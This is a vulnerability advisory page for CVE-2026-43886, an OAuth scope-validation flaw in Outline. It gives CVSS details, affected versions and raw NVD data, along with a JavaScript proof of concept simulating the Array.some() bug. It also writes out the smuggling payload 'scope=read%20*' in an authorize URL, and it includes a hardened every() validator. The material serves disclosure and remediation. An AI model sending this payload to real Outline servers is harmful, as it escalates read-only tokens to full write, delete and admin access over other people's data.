Security Vulnerability Report
CVE-2026-43886 CVSS 8.2 HIGH

CVE-2026-43886

Published: 2026-05-11 22:22:13
Last Modified: 2026-05-11 22:22:13

Description

Outline is a service that allows for collaborative documentation. In versions 0.84.0 through 1.6.1, a logic error in OAuthInterface.validateScope() uses Array.some() to validate the requested OAuth scopes, so the function accepts the entire scope array as long as any single scope in it is valid. An attacker can smuggle the wildcard * scope by requesting the space-separated scope list scope=read * (URL-encoded as scope=read%20*): the read scope satisfies the check and the * scope rides along, escalating a read-only OAuth token to full unrestricted API access including write, delete, and admin operations. The victim still has to go through the authorization flow for the attacker's client, consistent with the UI:R in the CVSS vector. This vulnerability is fixed in 1.7.0.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N

Configurations (Affected Products)


Outline 0.84.0
Outline 0.84.1
Outline 0.85.0
Outline 0.86.0
Outline 0.87.0
Outline 0.88.0
Outline 0.89.0
Outline 0.90.0
Outline 0.91.0
Outline 0.92.0
Outline 0.93.0
Outline 0.94.0
Outline 0.95.0
Outline 0.96.0
Outline 0.97.0
Outline 0.98.0
Outline 0.99.0
Outline 1.0.0
Outline 1.1.0
Outline 1.2.0
Outline 1.3.0
Outline 1.4.0
Outline 1.5.0
Outline 1.6.0
Outline 1.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```javascript
// Conceptual proof of concept for CVE-2026-43886
// This script demonstrates the logic flaw in OAuthInterface.validateScope()

// 1. Simulate the vulnerable validation logic
const vulnerableValidateScope = (requestedScopes, allowedScopes) => {
  // BUG: .some() lets the entire array pass if ONE element is valid
  return requestedScopes.some((scope) => allowedScopes.includes(scope));
};

// 2. Configuration
const allowedScopes = ["read"]; // Assume the user only authorized 'read'

// 3. Attack vector: smuggle the wildcard '*' by pairing it with a valid scope
const maliciousPayload = ["read", "*"];

// 4. Execution
const isAuthorized = vulnerableValidateScope(maliciousPayload, allowedScopes);

if (isAuthorized) {
  console.log("[+] Vulnerability triggered!");
  console.log("[+] Server accepted the payload:", maliciousPayload);
  console.log("[+] Attacker now has full access via the '*' scope.");
  // Real-world exploitation would involve sending a request like:
  // GET /oauth/authorize?client_id=...&response_type=code&scope=read%20*&redirect_uri=...
} else {
  console.log("[-] Request rejected.");
}
```
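The PoC above only exercises the broken check. The following is an added example, not Outline's code and not taken from the advisory: it models the space-delimited scope parameter the description refers to, puts the Array.some() check next to the Array.every() form a fix would use, and shows why the wildcard on its own is rejected while "read *" is not. The function names, the allowed-scope list and the permission name "documents.delete" are assumptions for illustration; only the some()-versus-every() behaviour and the "read *" payload come from the CVE text.

```javascript
// Added example (hypothetical model, not Outline's OAuthInterface).
// Only the Array.some() flaw and the "read *" payload are from the advisory.

// OAuth 2.0 encodes a scope list as a space-delimited string, so the query
// parameter scope=read%20* arrives as the two tokens "read" and "*".
function parseScopeParam(raw) {
  return raw.split(" ").filter((s) => s.length > 0);
}

// Scopes a read-only client is permitted to request (constructed sample).
const ALLOWED_SCOPES = ["read"];

// Vulnerable shape: .some() returns true as soon as ONE element is allowed,
// so ["read", "*"] passes because "read" is valid. A lone ["*"] still fails,
// which is why the attacker has to pair the wildcard with a legitimate scope.
function validateScopeVulnerable(requested, allowed = ALLOWED_SCOPES) {
  return requested.some((scope) => allowed.includes(scope));
}

// Hardened shape: every requested scope must be individually allowed, an
// empty list is rejected, and a client-supplied wildcard is never accepted.
function validateScopeFixed(requested, allowed = ALLOWED_SCOPES) {
  if (requested.length === 0) return false;
  return requested.every((scope) => scope !== "*" && allowed.includes(scope));
}

// Model of a token's effective permissions once the scope list is granted:
// a token carrying "*" satisfies every permission check (assumed semantics).
function tokenCan(grantedScopes, permission) {
  return grantedScopes.includes("*") || grantedScopes.includes(permission);
}

// Push one raw scope parameter through both checks and report what a token
// minted by the vulnerable path would be able to do.
function demo(rawScopeParam) {
  const requested = parseScopeParam(rawScopeParam);
  const vulnerableAccepts = validateScopeVulnerable(requested);
  const fixedAccepts = validateScopeFixed(requested);
  return {
    requested,
    vulnerableAccepts,
    fixedAccepts,
    vulnerableTokenCanDelete:
      vulnerableAccepts && tokenCan(requested, "documents.delete"),
  };
}

console.log(demo("read *"));
console.log(demo("*"));
console.log(demo("read"));
```

The check to look for when auditing a scope validator is the quantifier: a request is acceptable only if all of its scopes are, so the predicate must be universal (every), and any privileged or wildcard scope should be rejected explicitly rather than relied on to be absent from the allow-list.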

References

https://github.com/outline/outline/security/advisories/GHSA-7732-6qrg-wjf4 (GitHub Security Advisory; the only reference in the NVD record below)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-43886",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T22:22:13.350",
    "lastModified": "2026-05-11T22:22:13.350",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Outline is a service that allows for collaborative documentation. From 0.84.0 to 1.6.1, a logic error in OAuthInterface.validateScope() uses Array.some() to validate requested OAuth scopes, causing the function to accept the entire scope array if any single scope is valid. An attacker can smuggle the wildcard * scope by requesting scope=read *, escalating a read-only OAuth token to full unrestricted API access including write, delete, and admin operations. This vulnerability is fixed in 1.7.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-269"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/outline/outline/security/advisories/GHSA-7732-6qrg-wjf4",
        "source": "[email protected]"
      }
    ]
  }
}
```